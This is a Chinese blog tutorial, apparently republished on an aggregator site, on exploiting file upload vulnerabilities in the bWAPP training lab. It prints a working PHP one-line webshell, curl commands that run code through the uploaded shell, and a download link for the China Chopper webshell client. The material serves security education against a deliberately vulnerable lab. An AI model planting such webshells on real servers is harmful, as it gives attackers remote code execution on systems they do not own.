我是靠谱客的博主 明亮水壶,最近开发中收集的这篇文章主要介绍Web安全(一)文件上传漏洞[一]文件上传漏洞概述二、编辑木马文件并上传,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

个人博客:https://hackbg.gitee.io/

文章目录

  • 文件上传漏洞概述
  • 二、编辑木马文件并上传
    • 1.eval函数
    • 2.PHP一句话木马
    • 上传PHP文件
    • webshell执行命令
    • 使用中国菜刀连接
    • 不同语言一句话木马


文件上传漏洞概述

文件上传(File Upload)是大部分Web应用都具备的功能,例如用户上传附件、改头像、分享图片等。

文件上传漏洞是在开发者没有做充足验证(包括前端,后端)情况下,允许用户上传恶意文件,这里上传的文件可以是木马、病毒、恶意脚本或者Webshell等。


二、编辑木马文件并上传

1.eval函数

eval( string $code)

把字符串 code 作为PHP代码执行。函数eval()语言结构允许执行任意 PHP 代码。code为 需要被执行的字符串 。

代码执行的作用域是调用 eval() 处的作用域。因此,eval() 里任何的变量定义、修改,都会在函数结束后被保留。

2.PHP一句话木马

<?php @eval($_POST['hacker']); ?>

新建文本文件写入PHP一句话木马,并将txt后缀改为php.

在这里插入图片描述


上传PHP文件

登录bwapp靶场后选择Unrestricted File Upload,文件上传漏洞上传文件,上传后可以看到路径为 靶场路径+/images/shell.php

在这里插入图片描述
在这里插入图片描述

webshell执行命令

在cmd执行

curl -d "hacker=echo get_current_user();" 靶场路径/images/shell.php
curl -d "hacker=echo getcwd();" 靶场路径/images/shell.php

get_current_user — 获取当前 PHP 脚本所有者名称

getcwd — 取得当前工作目录。
在这里插入图片描述

使用中国菜刀连接

下载链接:https://github.com/raddyfiy/caidao-official-version

打开软件后,右键添加SHELL连接即可。

在这里插入图片描述

在这里插入图片描述

不同语言一句话木马

在这里插入图片描述

最后

以上就是明亮水壶为你收集整理的Web安全(一)文件上传漏洞[一]文件上传漏洞概述二、编辑木马文件并上传的全部内容,希望文章能够帮你解决Web安全(一)文件上传漏洞[一]文件上传漏洞概述二、编辑木马文件并上传所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(38)

评论列表共有 0 条评论

立即
投稿
返回
顶部